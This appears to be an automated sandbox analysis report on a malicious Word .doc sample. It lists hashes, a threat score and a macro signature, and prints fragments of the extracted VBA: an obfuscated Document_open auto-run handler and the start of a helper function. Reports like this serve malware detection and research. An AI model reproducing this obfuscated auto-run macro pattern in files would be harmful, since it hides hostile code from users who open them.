General

  • Target

    b27c8eefda06da11bf848084041ade7b_JaffaCakes118

  • Size

    220KB

  • MD5

    b27c8eefda06da11bf848084041ade7b

  • SHA1

    5c76a8150b9d56606596daacdbe769c488809f04

  • SHA256

    56863d3d891bcd7172c3c903618e8b5e15fd393f4dfd549c79a0b59774c0833a

  • SHA512

    ba457e7625474f7240209c1dd8871c60dce1bcce0511401c19bf0e77671e353a56d56424ca1aaf442b8c899d3464d42f33743ae925f69ceb56c0633911ccfb13

  • SSDEEP

    3072:b4tcTvjvTY140818tIP4ovpmSGju9jDW1M+7Hp3C:EtcnvE140o8tIP4apZjDjm1C

Score
8/10

Malware Config

Signatures

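  • Suspicious Office macro (1 IoC)

    Office document equipped with macros. The module Evmwfs38z7u listed under Files (VB_Base "1Normal.ThisDocument") defines a Document_open handler, which Word runs automatically when the document is opened with macros enabled.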

Files

  • b27c8eefda06da11bf848084041ade7b_JaffaCakes118
    .doc windows office2003

    Evmwfs38z7u

    Attribute VB_Name = "Evmwfs38z7u"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Private Sub Document_open()
    E36u8kije212xyoh6_ = Array(Lcvuaap_8wlp9c3hj7 + "Cudxek5hdil1785k8F5uslly4m3z7qfl Xnmqrkg4m3w7ptd37x" + Blvj30m9cti, Eo8aq0qe9x3ft13n5, T8dwdhdp_pqz.F301p8dj6hmm, X_5djzldvsemeje0 + "Ntsx5qsdquq1cg Dnxi_ceh1nn9_wssbv H6lbcula5e6ns Eh2x8_nol4kqs")

    T8dwdhdp_pqz

    Attribute VB_Name = "T8dwdhdp_pqz"
    Attribute VB_Base = "0{7761E93A-2A3A-4F95-A9D3-C3EF81A407C4}{B36C846D-6A68-41F4-907E-68FF25C9F127}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False
    Function F301p8dj6hmm()
    On Error Resume Next
